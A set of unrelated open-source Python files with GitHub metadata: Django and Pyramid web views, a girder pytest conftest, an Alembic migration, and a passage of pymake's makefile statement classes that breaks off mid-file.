return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': self.name, 'url': 'cms:portfolio:delete',
'pk': self.get_object().pk}
@login_required
def toggle_active(request, pk):
entry = Entry.objects.non_deleted().get(pk=pk)
""" :type : Entry """
if entry.activated_at:
try:
entry.activated_at = False
entry.save()
messages.success(request, _('Entry has been deactivated'))
except:
messages.error(request, _('Error occurred during saving'))
else:
try:
entry.activated_at = datetime.now()
entry.save()
messages.success(request, _('Entry has been activated'))
except:
messages.error(request, _('Error occurred during saving'))
return HttpResponseRedirect(reverse('cms:portfolio:index'))
class CompanyList(LoginRequiredMixin, ListView):
queryset = Company.objects.all()
breadcrumbs = (
{'name': _('Portfolio'), 'url': 'cms:portfolio:index'},
{'name': _('Company'), 'url': 'cms:portfolio:company-index'},
)
listingColumns = (
('id', '#'),
('name', _('Name')),
('created_at', _('Date created')),
('action', _('Actions'))
)
mapColumns = {
'id': '_displayAsIs',
'name': '_displayEditLink',
'created_at': '_displayDate',
'action': '_displayActionLink',
}
actions = {
'create': 'company-create',
'update': 'company-update',
'delete': 'company-delete',
'index': 'company-index',
}
orderingColumns = {'id', 'name', 'created_at'}
searchColumns = {'name', 'teaser', 'content'}
class CompanyCreate(LoginRequiredMixin, CreateView):
model = Company
form_class = CompanyForm
actions = CompanyList.actions
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': _('Company'), 'url': 'cms:portfolio:company-index'}, \
{'name': self.name, 'url': 'cms:portfolio:company-create'}
class CompanyUpdate(LoginRequiredMixin, UpdateView):
model = Company
form_class = CompanyForm
actions = CompanyList.actions
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': _('Company'), 'url': 'cms:portfolio:company-index'}, \
{'name': self.name, 'url': 'cms:portfolio:company-update',
'pk': self.get_object().pk}
class CompanyDelete(LoginRequiredMixin, DeleteView):
model = Company
actions = CompanyList.actions
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': _('Company'), 'url': 'cms:portfolio:company-index'}, \
{'name': self.name, 'url': 'cms:portfolio:company-delete',
'pk': self.get_object().pk}
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
success_url = self.get_success_url()
try:
self.object.delete()
messages.success(request, _('Entry has been deleted'))
return http.HttpResponseRedirect(success_url)
except:
messages.error(request, _('An error has occurred'))
| {
"content_hash": "82416dc6ae6e423f79fcce292cd16b7c",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 78,
"avg_line_length": 29.6,
"alnum_prop": 0.5812543312543312,
"repo_name": "Alkemic/webpage",
"id": "4d0722a82b151ba5881e6088abbbebcb3a2e5914",
"size": "5796",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "module/portfolio/cms/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4649"
},
{
"name": "JavaScript",
"bytes": "287"
},
{
"name": "Python",
"bytes": "115710"
}
],
"symlink_target": ""
} |
from pyramid.response import Response
from pyramid.view import view_config, forbidden_view_config
from pyramid.security import authenticated_userid
from pyramid.renderers import render_to_response
from velruse import login_url
from datetime import datetime
import re
import pyramid.httpexceptions as exc
import logging
import sqlalchemy.exc
from pi_director.models.models import (
DBSession,
RasPi,
)
from pi_director.models.UserModel import UserModel
from pi_director.security import (
groupfinder,
)
from pi_director.controllers.controllers import (
get_pis,
get_logs,
get_tagged_pis,
)
from pi_director.controllers.user_controls import get_users
@forbidden_view_config(renderer="pi_director:templates/forbidden.mak")
def forbidden(request):
logging.info("Going into forbidden")
m = re.match("^/?(ajax|api).*$", request.path)
if m is not None:
'''we're trying to hit an api or ajax query without authentication'''
logging.warn("Someone tried to hit an ajax/api without authentication. Route: {route}".format(route=request.path))
return Response("{'status':'Forbidden'}")
userid = authenticated_userid(request)
if userid:
logging.info("User exists but some other problem occured, FORBIDDEN.")
group = groupfinder(userid, request)
logging.info("User {user} access level {access}".format(user=userid, access=group))
return ("")
if groupfinder(None, request) is None:
request.session['goingto'] = request.path
logging.info("Should be shunting to login page")
loc = request.route_url('velruse.google-login', _query=(('next', request.path),))
return exc.HTTPFound(location=loc)
@view_config(route_name='provision', permission='anon')
def view_provision(request):
response = render_to_response('pi_director:templates/provision.mak', {}, request=request)
response.content_type = 'text/plain'
return response
@view_config(route_name='home', renderer="pi_director:templates/home.mak", permission="admin")
def view_home(request):
logged_in = authenticated_userid(request)
loginurl = login_url(request, 'google')
PiList = get_pis()
return {"loginurl": loginurl, "logged_in": logged_in, "logouturl": request.route_url('logout'), 'pis': PiList}
@view_config(route_name='users', renderer="pi_director:templates/user.mak", permission="admin")
def view_users(request):
logged_in = authenticated_userid(request)
loginurl = login_url(request, 'google')
UserList = get_users()
return {"loginurl": loginurl, "logged_in": logged_in, "logouturl": request.route_url('logout'), 'users': UserList}
@view_config(route_name='logs', renderer="pi_director:templates/logs.mak", permission='admin')
def view_logs(request):
uuid = request.matchdict['uuid']
logs = get_logs(uuid)
return {"logs": logs, "uuid": uuid}
@view_config(route_name='tagged', renderer="pi_director:templates/home.mak", permission="admin")
def view_tagged(request):
tags = request.matchdict['tags']
tagged_pis = get_tagged_pis(tags)
return {'pis': tagged_pis, 'tags': tags}
@view_config(route_name='wall', renderer="pi_director:templates/wall.mak", permission="user")
def view_wall(request):
tags = request.matchdict['tags']
tagged_pis = get_tagged_pis(tags)
show_list = []
offline_list = []
for pi in tagged_pis:
timediff = datetime.now() - pi.lastseen
if timediff.total_seconds() <= 300:
show_list.append(pi)
else:
offline_list.append(pi)
return {'pis': show_list, 'offline': offline_list}
@view_config(route_name='redirectme')
def redirect_me(request):
uid = request.matchdict['uid']
url = "http://www.stackexchange.com"
try:
row = DBSession.query(RasPi).filter(RasPi.uuid==uid).first()
if row:
url = row.url
logging.info("UID {uid}: {page}".format(uid=row.uuid, page=url))
else:
row = RasPi()
row.uuid = uid
row.url = "http://www.stackexchange.com"
row.landscape = True
row.browser = True
DBSession.add(row)
DBSession.flush()
logging.warn("UID {uid} NOT FOUND. ADDED TO TABLE WITH DEFAULT URL".format(uid=uid))
url = row.url
except Exception:
logging.error("Something went south with DB when searching for {uid}".format(uid=uid))
raise exc.HTTPFound(url)
| {
"content_hash": "ec1e2bf46c6ae3f1091fac9a6975feee",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 123,
"avg_line_length": 34.63076923076923,
"alnum_prop": 0.6688138605064415,
"repo_name": "PeterGrace/pi_director",
"id": "fd359b5f13c573ccde6104e7845c4feb16ffb7b5",
"size": "4502",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pi_director/views/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3754"
},
{
"name": "JavaScript",
"bytes": "5866"
},
{
"name": "Makefile",
"bytes": "22288"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "54730"
},
{
"name": "Shell",
"bytes": "4992"
}
],
"symlink_target": ""
} |
import os
import subprocess
import pytest
pytestmark = pytest.mark.girder
@pytest.fixture
def unavailableWorker(db):
"""
Make sure that Girder Worker can't be reached and times out quickly.
"""
from girder_worker.girder_plugin.constants import PluginSettings as WorkerSettings
from girder.models.setting import Setting
# Use an invalid broker to make sure we don't connect to girder_worker so
# this will be incomplete. We don't want to use amqp as it will retry a
# very long time. The mongodb backend is deprecated and throws many
# warnings, but works for this test condition.
Setting().set(WorkerSettings.BROKER, 'mongodb://0.0.0.0')
Setting().set(WorkerSettings.BACKEND, 'mongodb://0.0.0.0')
yield True
Setting().unset(WorkerSettings.BROKER)
Setting().unset(WorkerSettings.BACKEND)
@pytest.fixture(scope='session')
def girderWorkerProcess():
broker = 'amqp://[email protected]'
backend = 'rpc://[email protected]'
env = os.environ.copy()
env['C_FORCE_ROOT'] = 'true'
proc = subprocess.Popen([
'celery', '-A', 'girder_worker.app', '--broker', broker,
'--result-backend', backend, 'worker', '--concurrency=1'],
close_fds=True, env=env)
yield True
proc.terminate()
proc.wait()
@pytest.fixture
def girderWorker(db, girderWorkerProcess):
"""
Run an instance of Girder worker, connected to rabbitmq. The rabbitmq
service must be running.
"""
from girder_worker.girder_plugin.constants import PluginSettings as WorkerSettings
from girder.models.setting import Setting
broker = 'amqp://[email protected]'
backend = 'rpc://[email protected]'
Setting().set(WorkerSettings.BROKER, broker)
Setting().set(WorkerSettings.BACKEND, backend)
yield True
Setting().unset(WorkerSettings.BROKER)
Setting().unset(WorkerSettings.BACKEND)
def unbindGirderEventsByHandlerName(handlerName):
from girder import events
for eventName in events._mapping:
events.unbind(eventName, handlerName)
@pytest.fixture
def unbindLargeImage(db):
yield True
unbindGirderEventsByHandlerName('large_image')
| {
"content_hash": "dcfeb119d868fd681e6faed14facd5cb",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 86,
"avg_line_length": 29.698630136986303,
"alnum_prop": 0.698339483394834,
"repo_name": "girder/large_image",
"id": "295ed9f1b782133f26b8680a87cc464dde4ffaa6",
"size": "2168",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "girder/test_girder/conftest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7114"
},
{
"name": "JavaScript",
"bytes": "307859"
},
{
"name": "Pug",
"bytes": "21406"
},
{
"name": "Python",
"bytes": "1371949"
},
{
"name": "Shell",
"bytes": "5500"
},
{
"name": "Stylus",
"bytes": "4261"
}
],
"symlink_target": ""
} |
"""added invoice model
Revision ID: a15fe29fe566
Revises: bdb82b2b0eb0
Create Date: 2016-04-14 20:44:53.860856
"""
# revision identifiers, used by Alembic.
revision = 'a15fe29fe566'
down_revision = 'bdb82b2b0eb0'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('invoices',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('owner_id', sa.Integer(), nullable=False),
sa.Column('ref_num', sa.Integer(), nullable=False),
sa.Column('issued_on', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('invoices')
### end Alembic commands ###
| {
"content_hash": "ca04ffc3852363d153b8787234ab108a",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 63,
"avg_line_length": 26.606060606060606,
"alnum_prop": 0.6708428246013668,
"repo_name": "skazi0/yaia",
"id": "c9070390f832f89144869b4502ca39445ddca5b9",
"size": "878",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "migrations/versions/a15fe29fe566_added_invoice_model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1086"
},
{
"name": "HTML",
"bytes": "22096"
},
{
"name": "JavaScript",
"bytes": "16701"
},
{
"name": "Makefile",
"bytes": "885"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "42526"
},
{
"name": "Shell",
"bytes": "1009"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import logging, re, os
import data, parser, util
from pymake.globrelative import hasglob, glob
from pymake import errors
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
_log = logging.getLogger('pymake.data')
_tabwidth = 4
class Location(object):
"""
A location within a makefile.
For the moment, locations are just path/line/column, but in the future
they may reference parent locations for more accurate "included from"
or "evaled at" error reporting.
"""
__slots__ = ('path', 'line', 'column')
def __init__(self, path, line, column):
self.path = path
self.line = line
self.column = column
def offset(self, s, start, end):
"""
Returns a new location offset by
the specified string.
"""
if start == end:
return self
skiplines = s.count('\n', start, end)
line = self.line + skiplines
if skiplines:
lastnl = s.rfind('\n', start, end)
assert lastnl != -1
start = lastnl + 1
column = 0
else:
column = self.column
while True:
j = s.find('\t', start, end)
if j == -1:
column += end - start
break
column += j - start
column += _tabwidth
column -= column % _tabwidth
start = j + 1
return Location(self.path, line, column)
def __str__(self):
return "%s:%s:%s" % (self.path, self.line, self.column)
def _expandwildcards(makefile, tlist):
for t in tlist:
if not hasglob(t):
yield t
else:
l = glob(makefile.workdir, t)
for r in l:
yield r
_flagescape = re.compile(r'([\s\\])')
def parsecommandlineargs(args):
"""
Given a set of arguments from a command-line invocation of make,
parse out the variable definitions and return (stmts, arglist, overridestr)
"""
overrides = []
stmts = StatementList()
r = []
for i in range(0, len(args)):
a = args[i]
vname, t, val = util.strpartition(a, ':=')
if t == '':
vname, t, val = util.strpartition(a, '=')
if t != '':
overrides.append(_flagescape.sub(r'\\\1', a))
vname = vname.strip()
vnameexp = data.Expansion.fromstring(vname, "Command-line argument")
stmts.append(ExportDirective(vnameexp, concurrent_set=True))
stmts.append(SetVariable(vnameexp, token=t,
value=val, valueloc=Location('<command-line>', i, len(vname) + len(t)),
targetexp=None, source=data.Variables.SOURCE_COMMANDLINE))
else:
r.append(data.stripdotslash(a))
return stmts, r, ' '.join(overrides)
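# Illustrative example (not part of the original module): for a command line
# such as ['FOO=bar', 'all'], parsecommandlineargs returns a StatementList that
# exports and sets FOO with source SOURCE_COMMANDLINE, the remaining target
# list ['all'], and the override string 'FOO=bar'.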
class Statement(object):
"""
Represents parsed make file syntax.
This is an abstract base class. Child classes are expected to implement
basic methods defined below.
"""
def execute(self, makefile, context):
"""Executes this Statement within a make file execution context."""
raise Exception("%s must implement execute()." % self.__class__)
def to_source(self):
"""Obtain the make file "source" representation of the Statement.
This converts an individual Statement back to a string that can again
be parsed into this Statement.
"""
raise Exception("%s must implement to_source()." % self.__class__)
def __eq__(self, other):
raise Exception("%s must implement __eq__." % self.__class__)
def __ne__(self, other):
        return not self.__eq__(other)
class DummyRule(object):
__slots__ = ()
def addcommand(self, r):
pass
class Rule(Statement):
"""
Rules represent how to make specific targets.
See https://www.gnu.org/software/make/manual/make.html#Rules.
An individual rule is composed of a target, dependencies, and a recipe.
This class only contains references to the first 2. The recipe will be
contained in Command classes which follow this one in a stream of Statement
instances.
Instances also contain a boolean property `doublecolon` which says whether
this is a doublecolon rule. Doublecolon rules are rules that are always
executed, if they are evaluated. Normally, rules are only executed if their
target is out of date.
"""
__slots__ = ('targetexp', 'depexp', 'doublecolon')
def __init__(self, targetexp, depexp, doublecolon):
assert isinstance(targetexp, (data.Expansion, data.StringExpansion))
assert isinstance(depexp, (data.Expansion, data.StringExpansion))
self.targetexp = targetexp
self.depexp = depexp
self.doublecolon = doublecolon
def execute(self, makefile, context):
if context.weak:
self._executeweak(makefile, context)
else:
self._execute(makefile, context)
def _executeweak(self, makefile, context):
"""
If the context is weak (we're just handling dependencies) we can make a number of assumptions here.
This lets us go really fast and is generally good.
"""
assert context.weak
deps = self.depexp.resolvesplit(makefile, makefile.variables)
# Skip targets with no rules and no dependencies
if not deps:
return
targets = data.stripdotslashes(self.targetexp.resolvesplit(makefile, makefile.variables))
rule = data.Rule(list(data.stripdotslashes(deps)), self.doublecolon, loc=self.targetexp.loc, weakdeps=True)
for target in targets:
makefile.gettarget(target).addrule(rule)
makefile.foundtarget(target)
context.currule = rule
def _execute(self, makefile, context):
assert not context.weak
atargets = data.stripdotslashes(self.targetexp.resolvesplit(makefile, makefile.variables))
targets = [data.Pattern(p) for p in _expandwildcards(makefile, atargets)]
if not len(targets):
context.currule = DummyRule()
return
ispatterns = set((t.ispattern() for t in targets))
if len(ispatterns) == 2:
raise errors.DataError("Mixed implicit and normal rule", self.targetexp.loc)
ispattern, = ispatterns
deps = list(_expandwildcards(makefile, data.stripdotslashes(self.depexp.resolvesplit(makefile, makefile.variables))))
if ispattern:
prerequisites = [data.Pattern(d) for d in deps]
rule = data.PatternRule(targets, prerequisites, self.doublecolon, loc=self.targetexp.loc)
makefile.appendimplicitrule(rule)
else:
rule = data.Rule(deps, self.doublecolon, loc=self.targetexp.loc, weakdeps=False)
for t in targets:
makefile.gettarget(t.gettarget()).addrule(rule)
makefile.foundtarget(targets[0].gettarget())
context.currule = rule
def dump(self, fd, indent):
print("%sRule %s: %s" % (indent, self.targetexp, self.depexp), file=fd)
def to_source(self):
sep = ':'
if self.doublecolon:
sep = '::'
deps = self.depexp.to_source()
if len(deps) > 0 and not deps[0].isspace():
sep += ' '
return '\n%s%s%s' % (
self.targetexp.to_source(escape_variables=True),
sep,
deps)
def __eq__(self, other):
if not isinstance(other, Rule):
return False
return self.targetexp == other.targetexp \
and self.depexp == other.depexp \
and self.doublecolon == other.doublecolon
class StaticPatternRule(Statement):
"""
Static pattern rules are rules which specify multiple targets based on a
string pattern.
See https://www.gnu.org/software/make/manual/make.html#Static-Pattern
They are like `Rule` instances except an added property, `patternexp` is
present. It contains the Expansion which represents the rule pattern.
"""
__slots__ = ('targetexp', 'patternexp', 'depexp', 'doublecolon')
def __init__(self, targetexp, patternexp, depexp, doublecolon):
assert isinstance(targetexp, (data.Expansion, data.StringExpansion))
assert isinstance(patternexp, (data.Expansion, data.StringExpansion))
assert isinstance(depexp, (data.Expansion, data.StringExpansion))
self.targetexp = targetexp
self.patternexp = patternexp
self.depexp = depexp
self.doublecolon = doublecolon
def execute(self, makefile, context):
if context.weak:
raise errors.DataError("Static pattern rules not allowed in includedeps", self.targetexp.loc)
targets = list(_expandwildcards(makefile, data.stripdotslashes(self.targetexp.resolvesplit(makefile, makefile.variables))))
if not len(targets):
context.currule = DummyRule()
return
patterns = list(data.stripdotslashes(self.patternexp.resolvesplit(makefile, makefile.variables)))
if len(patterns) != 1:
raise errors.DataError("Static pattern rules must have a single pattern", self.patternexp.loc)
pattern = data.Pattern(patterns[0])
deps = [data.Pattern(p) for p in _expandwildcards(makefile, data.stripdotslashes(self.depexp.resolvesplit(makefile, makefile.variables)))]
rule = data.PatternRule([pattern], deps, self.doublecolon, loc=self.targetexp.loc)
for t in targets:
if data.Pattern(t).ispattern():
raise errors.DataError("Target '%s' of a static pattern rule must not be a pattern" % (t,), self.targetexp.loc)
stem = pattern.match(t)
if stem is None:
raise errors.DataError("Target '%s' does not match the static pattern '%s'" % (t, pattern), self.targetexp.loc)
makefile.gettarget(t).addrule(data.PatternRuleInstance(rule, '', stem, pattern.ismatchany()))
makefile.foundtarget(targets[0])
context.currule = rule
def dump(self, fd, indent):
print("%sStaticPatternRule %s: %s: %s" % (indent, self.targetexp, self.patternexp, self.depexp), file=fd)
def to_source(self):
sep = ':'
if self.doublecolon:
sep = '::'
pattern = self.patternexp.to_source()
deps = self.depexp.to_source()
if len(pattern) > 0 and pattern[0] not in (' ', '\t'):
sep += ' '
return '\n%s%s%s:%s' % (
self.targetexp.to_source(escape_variables=True),
sep,
pattern,
deps)
def __eq__(self, other):
if not isinstance(other, StaticPatternRule):
return False
return self.targetexp == other.targetexp \
and self.patternexp == other.patternexp \
and self.depexp == other.depexp \
and self.doublecolon == other.doublecolon
class Command(Statement):
"""
Commands are things that get executed by a rule.
A rule's recipe is composed of 0 or more Commands.
A command is simply an expansion. Commands typically represent strings to
be executed in a shell (e.g. via system()). Although, since make files
allow arbitrary shells to be used for command execution, this isn't a
guarantee.
"""
__slots__ = ('exp',)
def __init__(self, exp):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
def execute(self, makefile, context):
assert context.currule is not None
if context.weak:
raise errors.DataError("rules not allowed in includedeps", self.exp.loc)
context.currule.addcommand(self.exp)
def dump(self, fd, indent):
print("%sCommand %s" % (indent, self.exp,), file=fd)
def to_source(self):
# Commands have some interesting quirks when it comes to source
# formatting. First, they can be multi-line. Second, a tab needs to be
# inserted at the beginning of every line. Finally, there might be
# variable references inside the command. This means we need to escape
# variable references inside command strings. Luckily, this is handled
# by the Expansion.
s = self.exp.to_source(escape_variables=True)
return '\n'.join(['\t%s' % line for line in s.split('\n')])
def __eq__(self, other):
if not isinstance(other, Command):
return False
return self.exp == other.exp
class SetVariable(Statement):
"""
Represents a variable assignment.
Variable assignment comes in two different flavors.
Simple assignment has the form:
<Expansion> <Assignment Token> <string>
e.g. FOO := bar
These correspond to the fields `vnameexp`, `token`, and `value`. In
addition, `valueloc` will be a Location and `source` will be a
pymake.data.Variables.SOURCE_* constant.
There are also target-specific variables. These are variables that only
apply in the context of a specific target. They are like the aforementioned
assignment except the `targetexp` field is set to an Expansion representing
the target they apply to.
"""
__slots__ = ('vnameexp', 'token', 'value', 'valueloc', 'targetexp', 'source')
def __init__(self, vnameexp, token, value, valueloc, targetexp, source=None):
assert isinstance(vnameexp, (data.Expansion, data.StringExpansion))
assert isinstance(value, str)
assert targetexp is None or isinstance(targetexp, (data.Expansion, data.StringExpansion))
if source is None:
source = data.Variables.SOURCE_MAKEFILE
self.vnameexp = vnameexp
self.token = token
self.value = value
self.valueloc = valueloc
self.targetexp = targetexp
self.source = source
def execute(self, makefile, context):
vname = self.vnameexp.resolvestr(makefile, makefile.variables)
if len(vname) == 0:
raise errors.DataError("Empty variable name", self.vnameexp.loc)
if self.targetexp is None:
setvariables = [makefile.variables]
else:
setvariables = []
targets = [data.Pattern(t) for t in data.stripdotslashes(self.targetexp.resolvesplit(makefile, makefile.variables))]
for t in targets:
if t.ispattern():
setvariables.append(makefile.getpatternvariables(t))
else:
setvariables.append(makefile.gettarget(t.gettarget()).variables)
for v in setvariables:
if self.token == '+=':
v.append(vname, self.source, self.value, makefile.variables, makefile)
continue
if self.token == '?=':
flavor = data.Variables.FLAVOR_RECURSIVE
oldflavor, oldsource, oldval = v.get(vname, expand=False)
if oldval is not None:
continue
value = self.value
elif self.token == '=':
flavor = data.Variables.FLAVOR_RECURSIVE
value = self.value
else:
assert self.token == ':='
flavor = data.Variables.FLAVOR_SIMPLE
d = parser.Data.fromstring(self.value, self.valueloc)
e, t, o = parser.parsemakesyntax(d, 0, (), parser.iterdata)
value = e.resolvestr(makefile, makefile.variables)
v.set(vname, flavor, self.source, value)
def dump(self, fd, indent):
print("%sSetVariable<%s> %s %s\n%s %r" % (indent, self.valueloc, self.vnameexp, self.token, indent, self.value), file=fd)
def __eq__(self, other):
if not isinstance(other, SetVariable):
return False
return self.vnameexp == other.vnameexp \
and self.token == other.token \
and self.value == other.value \
and self.targetexp == other.targetexp \
and self.source == other.source
def to_source(self):
chars = []
for i in range(0, len(self.value)):
c = self.value[i]
# Literal # is escaped in variable assignment otherwise it would be
# a comment.
if c == '#':
# If a backslash precedes this, we need to escape it as well.
if i > 0 and self.value[i-1] == '\\':
chars.append('\\')
chars.append('\\#')
continue
chars.append(c)
value = ''.join(chars)
prefix = ''
if self.source == data.Variables.SOURCE_OVERRIDE:
prefix = 'override '
# SetVariable come in two flavors: simple and target-specific.
# We handle the target-specific syntax first.
if self.targetexp is not None:
return '%s: %s %s %s' % (
self.targetexp.to_source(),
self.vnameexp.to_source(),
self.token,
value)
# The variable could be multi-line or have leading whitespace. For
# regular variable assignment, whitespace after the token but before
# the value is ignored. If we see leading whitespace in the value here,
# the variable must have come from a define.
if value.count('\n') > 0 or (len(value) and value[0].isspace()):
# The parser holds the token in vnameexp for whatever reason.
return '%sdefine %s\n%s\nendef' % (
prefix,
self.vnameexp.to_source(),
value)
return '%s%s %s %s' % (
prefix,
self.vnameexp.to_source(),
self.token,
value)
class Condition(object):
"""
An abstract "condition", either ifeq or ifdef, perhaps negated.
See https://www.gnu.org/software/make/manual/make.html#Conditional-Syntax
Subclasses must implement:
def evaluate(self, makefile)
"""
def __eq__(self, other):
raise Exception("%s must implement __eq__." % __class__)
def __ne__(self, other):
return not self.__eq__(other)
class EqCondition(Condition):
"""
Represents an ifeq or ifneq conditional directive.
This directive consists of two Expansions which are compared for equality.
The `expected` field is a bool indicating what the condition must evaluate
to in order for its body to be executed. If True, this is an "ifeq"
conditional directive. If False, an "ifneq."
"""
__slots__ = ('exp1', 'exp2', 'expected')
def __init__(self, exp1, exp2):
assert isinstance(exp1, (data.Expansion, data.StringExpansion))
assert isinstance(exp2, (data.Expansion, data.StringExpansion))
self.expected = True
self.exp1 = exp1
self.exp2 = exp2
def evaluate(self, makefile):
r1 = self.exp1.resolvestr(makefile, makefile.variables)
r2 = self.exp2.resolvestr(makefile, makefile.variables)
return (r1 == r2) == self.expected
def __str__(self):
return "ifeq (expected=%s) %s %s" % (self.expected, self.exp1, self.exp2)
def __eq__(self, other):
if not isinstance(other, EqCondition):
return False
return self.exp1 == other.exp1 \
and self.exp2 == other.exp2 \
and self.expected == other.expected
class IfdefCondition(Condition):
"""
Represents an ifdef or ifndef conditional directive.
This directive consists of a single expansion which represents the name of
a variable (without the leading '$') which will be checked for definition.
The `expected` field is a bool and has the same behavior as EqCondition.
If it is True, this represents a "ifdef" conditional. If False, "ifndef."
"""
__slots__ = ('exp', 'expected')
def __init__(self, exp):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
self.expected = True
def evaluate(self, makefile):
vname = self.exp.resolvestr(makefile, makefile.variables)
flavor, source, value = makefile.variables.get(vname, expand=False)
if value is None:
return not self.expected
return (len(value) > 0) == self.expected
def __str__(self):
return "ifdef (expected=%s) %s" % (self.expected, self.exp)
def __eq__(self, other):
if not isinstance(other, IfdefCondition):
return False
return self.exp == other.exp and self.expected == other.expected
class ElseCondition(Condition):
"""
Represents the transition between branches in a ConditionBlock.
"""
__slots__ = ()
def evaluate(self, makefile):
return True
def __str__(self):
return "else"
def __eq__(self, other):
return isinstance(other, ElseCondition)
class ConditionBlock(Statement):
"""
A set of related Conditions.
This is essentially a list of 2-tuples of (Condition, list(Statement)).
The parser creates a ConditionBlock for all statements related to the same
conditional group. If iterating over the parser's output, where you think
    you would see an ifeq, you will see a ConditionBlock containing an EqCondition. In
other words, the parser collapses separate statements into this container
class.
ConditionBlock instances may exist within other ConditionBlock if the
conditional logic is multiple levels deep.
"""
__slots__ = ('loc', '_groups')
def __init__(self, loc, condition):
self.loc = loc
self._groups = []
self.addcondition(loc, condition)
def getloc(self):
return self.loc
def addcondition(self, loc, condition):
assert isinstance(condition, Condition)
condition.loc = loc
if len(self._groups) and isinstance(self._groups[-1][0], ElseCondition):
raise errors.SyntaxError("Multiple else conditions for block starting at %s" % self.loc, loc)
self._groups.append((condition, StatementList()))
def append(self, statement):
self._groups[-1][1].append(statement)
def execute(self, makefile, context):
i = 0
for c, statements in self._groups:
if c.evaluate(makefile):
_log.debug("Condition at %s met by clause #%i", self.loc, i)
statements.execute(makefile, context)
return
i += 1
def dump(self, fd, indent):
print("%sConditionBlock" % (indent,), file=fd)
indent2 = indent + ' '
for c, statements in self._groups:
print("%s Condition %s" % (indent, c), file=fd)
statements.dump(fd, indent2)
print("%s ~Condition" % (indent,), file=fd)
print("%s~ConditionBlock" % (indent,), file=fd)
def to_source(self):
lines = []
index = 0
for condition, statements in self:
lines.append(ConditionBlock.condition_source(condition, index))
index += 1
for statement in statements:
lines.append(statement.to_source())
lines.append('endif')
return '\n'.join(lines)
def __eq__(self, other):
if not isinstance(other, ConditionBlock):
return False
if len(self) != len(other):
return False
for i in range(0, len(self)):
our_condition, our_statements = self[i]
other_condition, other_statements = other[i]
if our_condition != other_condition:
return False
if our_statements != other_statements:
return False
return True
@staticmethod
def condition_source(statement, index):
"""Convert a condition to its source representation.
The index argument defines the index of this condition inside a
ConditionBlock. If it is greater than 0, an "else" will be prepended
to the result, if necessary.
"""
prefix = ''
if isinstance(statement, (EqCondition, IfdefCondition)) and index > 0:
prefix = 'else '
if isinstance(statement, IfdefCondition):
s = statement.exp.s
if statement.expected:
return '%sifdef %s' % (prefix, s)
return '%sifndef %s' % (prefix, s)
if isinstance(statement, EqCondition):
args = [
statement.exp1.to_source(escape_comments=True),
statement.exp2.to_source(escape_comments=True)]
use_quotes = False
single_quote_present = False
double_quote_present = False
for i, arg in enumerate(args):
if len(arg) > 0 and (arg[0].isspace() or arg[-1].isspace()):
use_quotes = True
if "'" in arg:
single_quote_present = True
if '"' in arg:
double_quote_present = True
# Quote everything if needed.
if single_quote_present and double_quote_present:
raise Exception('Cannot format condition with multiple quotes.')
if use_quotes:
for i, arg in enumerate(args):
# Double to single quotes.
if single_quote_present:
args[i] = '"' + arg + '"'
else:
args[i] = "'" + arg + "'"
body = None
if use_quotes:
body = ' '.join(args)
else:
body = '(%s)' % ','.join(args)
if statement.expected:
return '%sifeq %s' % (prefix, body)
return '%sifneq %s' % (prefix, body)
if isinstance(statement, ElseCondition):
return 'else'
raise Exception('Unhandled Condition statement: %s' %
statement.__class__)
def __iter__(self):
return iter(self._groups)
def __len__(self):
return len(self._groups)
def __getitem__(self, i):
return self._groups[i]
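# Illustrative note (not part of the original module): a ConditionBlock whose
# first branch is an IfdefCondition on DEBUG and whose second is an
# ElseCondition serializes via to_source() to roughly
#
#   ifdef DEBUG
#   ...statements...
#   else
#   ...statements...
#   endif
#
# with each branch's statements rendered by their own to_source() methods.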
class Include(Statement):
"""
Represents the include directive.
See https://www.gnu.org/software/make/manual/make.html#Include
The file to be included is represented by the Expansion defined in the
field `exp`. `required` is a bool indicating whether execution should fail
if the specified file could not be processed.
"""
    __slots__ = ('exp', 'required', 'weak')
def __init__(self, exp, required, weak):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
self.required = required
self.weak = weak
def execute(self, makefile, context):
files = self.exp.resolvesplit(makefile, makefile.variables)
for f in files:
makefile.include(f, self.required, loc=self.exp.loc, weak=self.weak)
def dump(self, fd, indent):
print("%sInclude %s" % (indent, self.exp), file=fd)
def to_source(self):
prefix = ''
if not self.required:
prefix = '-'
return '%sinclude %s' % (prefix, self.exp.to_source())
def __eq__(self, other):
if not isinstance(other, Include):
return False
return self.exp == other.exp and self.required == other.required
class VPathDirective(Statement):
"""
Represents the vpath directive.
See https://www.gnu.org/software/make/manual/make.html#Selective-Search
"""
